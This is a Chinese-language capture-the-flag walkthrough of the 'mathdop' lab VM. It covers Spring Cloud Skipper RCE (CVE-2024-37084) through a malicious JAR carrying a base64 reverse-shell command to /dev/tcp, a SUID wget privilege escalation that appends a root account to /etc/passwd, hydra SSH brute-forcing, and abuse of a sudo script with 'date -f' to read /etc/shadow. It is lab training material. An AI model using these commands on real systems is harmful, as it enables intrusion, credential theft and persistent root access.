信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.153  08:00:27:63:c3:6c       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e5:17       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 4 responded
❯ export ip=192.168.60.153
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.153:22
Open 192.168.60.153:7577
Open 192.168.60.153:9393
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 21:03 CST
Initiating ARP Ping Scan at 21:03
Scanning 192.168.60.153 [1 port]
Completed ARP Ping Scan at 21:03, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:03
Completed Parallel DNS resolution of 1 host. at 21:03, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:03
Scanning 192.168.60.153 [3 ports]
Discovered open port 22/tcp on 192.168.60.153
Discovered open port 7577/tcp on 192.168.60.153
Discovered open port 9393/tcp on 192.168.60.153
Completed SYN Stealth Scan at 21:03, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.153
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-04-23 21:03:34 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
7577/tcp open  unknown syn-ack ttl 63
9393/tcp open  unknown syn-ack ttl 63
MAC Address: 08:00:27:63:C3:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

并没有开放常规端口

尝试nc连接一下，发现存在web服务

❯ nc -v $ip 7577
192.168.60.153: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.60.153] 7577 (?) open
ls
HTTP/1.1 400
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 435
Date: Wed, 23 Apr 2025 13:04:37 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1></body></html>%

POC利用

经过查询得知，这两个端口是一般是成对出现的

端口	服务组件	作用
7577	Spring Cloud Skipper	管理部署、升级、回滚 Spring Boot apps（尤其是 Stream apps）
9393	Spring Cloud Data Flow	提供 UI 和 API，用于创建、管理流式数据管道（stream）和批处理任务（task）

在7577端口中发现返回的是json格式的数据

从/api/about中得知了Spring Cloud Skipper服务的版本为2.11.3-SNAPSHOT还是个快照版的

❯ curl http://192.168.60.153:7577/api/about
{
  "versionInfo" : {
    "server" : {
      "name" : "Spring Cloud Skipper Server",
      "version" : "2.11.3-SNAPSHOT"
    },
    "shell" : {
      "name" : "Spring Cloud Skipper Shell",
      "version" : "2.11.3-SNAPSHOT",
      "url" : "https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-skipper-shell/2.11.3-SNAPSHOT/spring-cloud-skipper-shell-2.11.3-SNAPSHOT.jar"
    }
  }
}

网上搜寻得知存在RCE远程任意命令执行漏洞，并且有相关的POC利用方案

CVE-2024-37084: Spring Cloud 远程代码执行 | 研究 — CVE-2024-37084: Spring Cloud Remote Code Execution | Research

Kayiyan/CVE-2024-37084-Poc: Analysis , Demo exploit and poc about CVE-2024-37084

Ly4j/CVE-2024-37084-Exp：Spring Cloud Data Flow CVE-2024-37084 exp

不过利用需要先生成一个恶意的jar包

我们根据Readme中的说明文档，修改src\artsploit\AwesomeScriptEngineFactory.java中的base64

将Runtime.getRuntime().exec修改成自己需要执行的命令base64

public AwesomeScriptEngineFactory() {
    try {
        //If you want to rebound the shell: Base64 encoding is required.: bash -i >& /dev/tcp/192.168.67.147/4444  0>&1
        //then Runtime.getRuntime().exec("bash -c {echo,Base64 encoding}|{base64,-d}|{bash,-i}")
        Runtime.getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNjAuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

利用java编译一下恶意的jar包

❯ javac -source 8 -target 8 src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
warning: [options] bootstrap class path not set in conjunction with -source 8
warning: [options] source value 8 is obsolete and will be removed in a future release
warning: [options] target value 8 is obsolete and will be removed in a future release
warning: [options] To suppress warnings about obsolete options, use -Xlint:-options.
Note: src/artsploit/AwesomeScriptEngineFactory.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
4 warnings
❯ jar -cvf rev.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1692) (out= 757)(deflated 55%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1790) (out= 569)(deflated 68%)

利用python启动一个简易的HTTP服务，让靶机将rev.jar这个包加载进去

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.153 - - [23/Apr/2025 21:47:02] "GET /yaml-payload.jar HTTP/1.1" 200 -
192.168.60.153 - - [23/Apr/2025 21:47:02] "GET /yaml-payload.jar HTTP/1.1" 200 -
-------------------------------------------
❯ python3 cve-2024-37084-exp.py -u http://192.168.60.153:7577 -payload http://192.168.60.100:8000/yaml-payload.jar

用户提权

同时监听端口，即可拿到运行Spring Cloud Skippe的shell

通过查看IP得知当前环境是在docker中的

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 921567b128b2-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.60.100:4444
[+] Got reverse shell from 921567b128b2-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/2025_04_23-21_47_03-067.log 📜
─────────────────────────────────────────────────────────────────────
cnb@921567b128b2:/workspace$ hostname -I
172.17.0.3

并且在家目录中存在note提示

从中得到用户名mathlake，并且密码可能是sha256(T+S+C)或者是sha256(T*S*C)

cnb@921567b128b2:~$ id
uid=1000(cnb) gid=1000(cnb) groups=1000(cnb)
cnb@921567b128b2:~$ cat note
Hi mathlake
Long time no see, 256 is my favorite number. I know you are very interested in mathematics, but I have been struggling with a math problem recently. The method used is time series decomposition. I have sent you the data, and you can provide me with the mathematical expressions for T, S, and C (rounded to the nearest integer) corresponding to the month.
June 2025
嗨mathlake
好久不见，256是我最喜欢的数字。我知道你对数学很感兴趣，但最近我一直在苦恼一个数学问题。使用的方法是时间序列分解。我已经把数据发给你了，你可以为我提供与月份对应的T、S和C（四舍五入到最接近的整数）的数学表达式。
2025年6月

在docker环境中是比较纯净的，缺少很多工具

我上传ligolo尝试建立TUN隧道

cnb@921567b128b2:~$ cd /tmp/
cnb@921567b128b2:/tmp$
[!] Session detached ⇲
(Penelope)─(Session [1])> upload ../../toolkit/
[+] Upload OK /tmp/toolkit-FefEEtdP
(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/2025_04_23-21_47_03-067.log 📜
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ ls
busybox  chisel  fscan  ligolo_agent  linpeas.sh  pspy64  socat  stowaway_agent
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ ./ligolo_agent -connect 192.168.60.100:11601 --ignore-cert &
[1] 1576
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"
---------------------------------------
❯ sudo ./proxy -selfcert
[sudo] password for Pepster:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0003] Creating a new "docker" interface...
INFO[0003] Interface created!
ligolo-ng » INFO[0007] Agent joined.                                 id=4bcb395a-e41f-4cd8-96ff-f49476ae83f7 name=cnb@921567b128b2 remote="192.168.60.153:57112"
ligolo-ng » session
? Specify a session : 1 - cnb@921567b128b2 - 192.168.60.153:57112 - 4bcb395a-e41f-4cd8-96ff-f49476ae83f7
[Agent : cnb@921567b128b2] » tunnel_start --tun docker
[Agent : cnb@921567b128b2] » INFO[0058] Starting tunnel to cnb@921567b128b2 (4bcb395a-e41f-4cd8-96ff-f49476ae83f7)
-----------------------------------------
❯ sudo ip route add 172.17.0.0/24 dev docker
[sudo] password for Pepster:

在docker内跑了一下linpeas

得到wget拥有SUID SGID权限

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x. 1 root shadow 34K Feb  2  2023 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x. 1 root shadow 34K Feb  2  2023 /sbin/unix_chkpwd
-rwxr-sr-x. 1 root shadow 71K Nov 29  2022 /usr/bin/chage
-rwxr-sr-x. 1 root shadow 23K Nov 29  2022 /usr/bin/expiry
-rwxr-sr-x. 1 root tty 31K Sep 16  2020 /usr/bin/wall
-rwsr-sr-x. 1 root root 488K Feb  5  2018 /usr/local/bin/wget

直接提权至容器中的root

cnb@921567b128b2:/tmp$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' > exp
cnb@921567b128b2:/tmp$ chmod +x exp
cnb@921567b128b2:/tmp$ /usr/local/bin/wget --use-askpass=/tmp/exp 0
# whoami
root
# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash' >>/etc/passwd
# exit
Error reading response from command "/tmp/exp Username for 'http://0': ": Success
cnb@921567b128b2:/tmp$ su primary
Password:
root@921567b128b2:/tmp#

好像并没有什么软用，root下也没有提示中有的数据

利用fscan全端口分别扫了一下

得知存在两个容器，两个容器分别映射了9393 7577端口至宿主机

root@921567b128b2:/tmp/toolkit-FefEEtdP# ./fscan -h 172.17.0.2 -p 0-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 172.17.0.2:9393
[+] 端口开放 172.17.0.2:19092
[+] 存活端口数量: 2
[*] 网站标题 http://172.17.0.2:9393    状态码:200 长度:6378   标题:无标题
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 10.554258253s
root@921567b128b2:/tmp/toolkit-FefEEtdP# ./fscan -h 172.17.0.3 -p 0-65535
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 172.17.0.3:7577
[+] 存活端口数量: 1
[*] 开始漏洞扫描...
[*] 网站标题 http://172.17.0.3:7577    状态码:302 长度:0      标题:无标题 重定向地址: http://172.17.0.3:7577/api
[*] 网站标题 http://172.17.0.3:7577/api 状态码:200 长度:848    标题:无标题
[+] 扫描已完成: 1/1
[*] 扫描结束,耗时: 7.623899s

172.17.0.3容器则提供7577端口，提供Spring Cloud Skipper服务

不过172.17.0.2容器在runtime中需要访问Skipper Server，但配置项中指定的ip不是0.3容器，而是本地，导致连接被重置

数学建模计算

卡住了

有一点是数据文件我都没找到，瞅了眼wp得知在/var/mail/mathlake中

root@921567b128b2:~# ls -al /var/mail/mathlake/
total 28
drwx--S---. 2 root mail    55 Mar 12 01:47 .
drwxrwsr-x. 1 root mail    22 Mar 12 01:41 ..
-rw-r--r--. 1 root mail 10299 Mar  7 08:14 data.xlsx
-rw-r--r--. 1 root mail  3906 Mar 11 23:56 test.png
-rw-r--r--. 1 root mail  8815 Mar 11 23:58 true.png

其实linpeas.sh也可以扫到，大意了，没注意到

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)
 19381532     12 -rw-r--r--   1 root     mail        10299 Mar  7 08:14 /var/mail/mathlake/data.xlsx
 19381533      4 -rw-r--r--   1 root     mail         3906 Mar 11 23:56 /var/mail/mathlake/test.png
 19381534     12 -rw-r--r--   1 root     mail         8815 Mar 11 23:58 /var/mail/mathlake/true.png
 19381532     12 -rw-r--r--   1 root     mail        10299 Mar  7 08:14 /var/spool/mail/mathlake/data.xlsx
 19381533      4 -rw-r--r--   1 root     mail         3906 Mar 11 23:56 /var/spool/mail/mathlake/test.png
 19381534     12 -rw-r--r--   1 root     mail         8815 Mar 11 23:58 /var/spool/mail/mathlake/true.png

下载到本地

(Penelope)─(Session [4])> download data.xlsx
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/data.xlsx'
(Penelope)─(Session [4])> download test.png
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/test.png'
(Penelope)─(Session [4])> download true.png
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/true.png'
(Penelope)─(Session [4])>

后面涉及到数字建模的问题了，直接丢给GPT

写个遍历此范围的sha256脚本

将结果保存至pass.txt

❯ cat a.sh
for i in {56..59}
do
        for j in {0..3}
        do
                for n in {0..3}
                do
                        echo "$i*$*j$n"|sha256sum|awk '{print $1}'
                done
        done
done
❯ bash a.sh>pass.txt

利用hydra爆破一下用户mathlake的凭证

❯ hydra -l mathlake -P pass.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-24 22:20:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries (l:1/p:66), ~5 tries per task
[DATA] attacking ssh://192.168.60.153:22/
[22][ssh] host: 192.168.60.153   login: mathlake   password: 9bd29d2c90998b5af05b3fdf10d9ab4c9eff53f2a827fbc39247200874ab6ca3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-24 22:20:21

得到凭证为9bd29d2c90998b5af05b3fdf10d9ab4c9eff53f2a827fbc39247200874ab6ca3

Root提权

尝试ssh登录一下

❯ ssh mathlake@$ip
[email protected]'s password:
Last failed login: Thu Apr 24 22:20:17 CST 2025 from 192.168.60.100 on ssh:notty
There were 97 failed login attempts since the last successful login.
Last login: Sun Mar 30 18:43:26 2025
[mathlake@mathdop ~]$ cat user.txt
flag{d79b3daf297f1ad136284d93900c0fe8543a52eb}

并且此用户拥有sudo权限，环境变量被严格限制，仅保留与语言、区域设置、显示相关的变量

[mathlake@mathdop ~]$ sudo -l
Matching Defaults entries for mathlake on mathdop:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User mathlake may run the following commands on mathdop:
    (ALL) NOPASSWD: /opt/secure_input_handler.sh

看一下脚本内容

[mathlake@mathdop ~]$ cat /opt/secure_input_handler.sh
#!/bin/bash
export PATH="/usr/bin"

read -p "Input Command: " user_input

decoded_input=$(echo -n "$user_input" | base64 -d 2>/dev/null | tr -d '\r\0\a' | col -b)
if [[ ${#user_input} -gt 128 || -z "$decoded_input" ]]; then
    echo "[!] Decoding failed or input is too long" >&2
    exit 2
fi

filtered_input=$(echo "$decoded_input" | tr -cd 'a-zA-Z0-9\-_/ :.' | sed -e 's/[[:space:]]\+/ /g' -e 's/^[ \t]*//' -e 's/[ \t]*$//')

IFS=' ' read -ra cmd_args <<< "$filtered_input"
command="${cmd_args[0]}"
command_clean=$(echo "$command" | tr -d -c 'a-zA-Z0-9')

allowed_commands=("date" "pwd" "echo")
if ! printf "%s\n" "${allowed_commands[@]}" | grep -qxF "$command_clean"; then
    echo "[!] Illegal instruction: $command_clean" >&2
    exit 3
fi

/usr/bin/timeout 2 /usr/bin/bash -c "${filtered_input}"

总的来说就是将输入的内容进行basr64解码后再进行过滤输入的内容，去掉空格和制表符之类的字符

具体过滤如下

对输入进行 Base64 解码。

删除控制字符（\r、\0、\a）。

使用 col -b 清理退格等不可见字符，防止终端转义攻击。

仅保留字母、数字、-、_、/、:、. 和空格。

合并连续空格，并去除首尾空白，防止参数注入

仅保留字母、数字、-、_、/、:、. 和空格。

合并连续空格，并去除首尾空白，防止参数注入。

将过滤后的输入按空格分割为命令和参数。

提取命令部分（第一个单词）。

二次清理命令名，仅保留字母数字（例如 e.c-ho → echo）。

检查清理后的命令名是否在允许的列表中，若不在则拒绝执行。

使用 timeout 2 限制命令最长运行 2秒。

通过绝对路径 /usr/bin/bash 执行命令，避免 Shell 别名或函数劫持。

只允许我们执行data pwd echo

不过data有个参数-f可以外带出文件内容实现任意文件读取

[mathlake@mathdop ~]$ date --help
Usage: date [OPTION]... [+FORMAT]
  or:  date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Display the current time in the given FORMAT, or set the system date.

Mandatory arguments to long options are mandatory for short options too.
  -d, --date=STRING         display time described by STRING, not 'now'
  -f, --file=DATEFILE       like --date once for each line of DATEFILE
  -I[TIMESPEC], --iso-8601[=TIMESPEC]  output date/time in ISO 8601 format.
                            TIMESPEC='date' for date only (the default),
                            'hours', 'minutes', 'seconds', or 'ns' for date
                            and time to the indicated precision.
  -r, --reference=FILE      display the last modification time of FILE
  -R, --rfc-2822            output date and time in RFC 2822 format.
                            Example: Mon, 07 Aug 2006 12:34:56 -0600
      --rfc-3339=TIMESPEC   output date and time in RFC 3339 format.
                            TIMESPEC='date', 'seconds', or 'ns' for
                            date and time to the indicated precision.
                            Date and time components are separated by
                            a single space: 2006-08-07 12:34:56-06:00
  -s, --set=STRING          set time described by STRING
  -u, --utc, --universal    print or set Coordinated Universal Time (UTC)
      --help     display this help and exit
      --version  output version information and exit

我尝试读取一下私钥文件，然而并不存在

常规文件的root.txt也不存在

[mathlake@mathdop ~]$ echo "date -f /root/.ssh/id_rsa"|base64
ZGF0ZSAtZiAvcm9vdC8uc3NoL2lkX3JzYQo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvcm9vdC8uc3NoL2lkX3JzYQo=
date: ‘/root/.ssh/id_rsa’: No such file or directory
[mathlake@mathdop ~]$ echo "date -f /root/root.txt"|base64
ZGF0ZSAtZiAvcm9vdC9yb290LnR4dAo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvcm9vdC9yb290LnR4dAo=
date: ‘/root/root.txt’: No such file or directory

不过/etc/shadow还是可以正常读的

前面有两行不寻常的字符

# Worth waiting for #9e9feaf74138c66fbaadba5a9da259c5

[mathlake@mathdop ~]$ echo "date -f /etc/shadow"|base64
ZGF0ZSAtZiAvZXRjL3NoYWRvdwo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvZXRjL3NoYWRvdwo=
date: invalid date ‘# Worth waiting for’
date: invalid date ‘# 9e9feaf74138c66fbaadba5a9da259c5’
date: invalid date ‘root:$6$WUx.0Qf6$/oYqJocLrdpGZJup8oAxMoxjJnZ3huUNKno6TObA/fcbax0yhptGiAP2pNcjJfsCQ0o5H2RgpyP6R/CiZh33m.:20177:0:99999:7:::’
date: invalid date ‘bin:*:18353:0:99999:7:::’
date: invalid date ‘daemon:*:18353:0:99999:7:::’
date: invalid date ‘adm:*:18353:0:99999:7:::’
date: invalid date ‘lp:*:18353:0:99999:7:::’
date: invalid date ‘sync:*:18353:0:99999:7:::’
date: invalid date ‘shutdown:*:18353:0:99999:7:::’
date: invalid date ‘halt:*:18353:0:99999:7:::’
date: invalid date ‘mail:*:18353:0:99999:7:::’
date: invalid date ‘operator:*:18353:0:99999:7:::’
date: invalid date ‘games:*:18353:0:99999:7:::’
date: invalid date ‘ftp:*:18353:0:99999:7:::’
date: invalid date ‘nobody:*:18353:0:99999:7:::’
date: invalid date ‘systemd-network:!!:20157::::::’
date: invalid date ‘dbus:!!:20157::::::’
date: invalid date ‘polkitd:!!:20157::::::’
date: invalid date ‘sshd:!!:20157::::::’
date: invalid date ‘postfix:!!:20157::::::’
date: invalid date ‘mathlake:$6$XdfsxCCu$sHnJOhJpbvkbW/aLnCE/4QyYVYW0j2DNSByRxiJ2pLuFJkXi8Yk.wD33.SEUxtTuZ3z1xYqchgilvmX2yzZsq.:20177:0:99999:7:::’

尝试作为密码登录root

第一个就是正确的root密码

[mathlake@mathdop ~]$ su root
Password:
[root@mathdop mathlake]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@mathdop mathlake]# cd /root
[root@mathdop ~]# ls
anaconda-ks.cfg  r00000000000000000000000000000000000000000000000000000t.txt
[root@mathdop ~]# cat r00000000000000000000000000000000000000000000000000000t.txt
flag{29975f78aafc266eaa88520357552917d1164964}

虽说作者定的难度为easy，但其中算数部分对我来说难度挺大的😅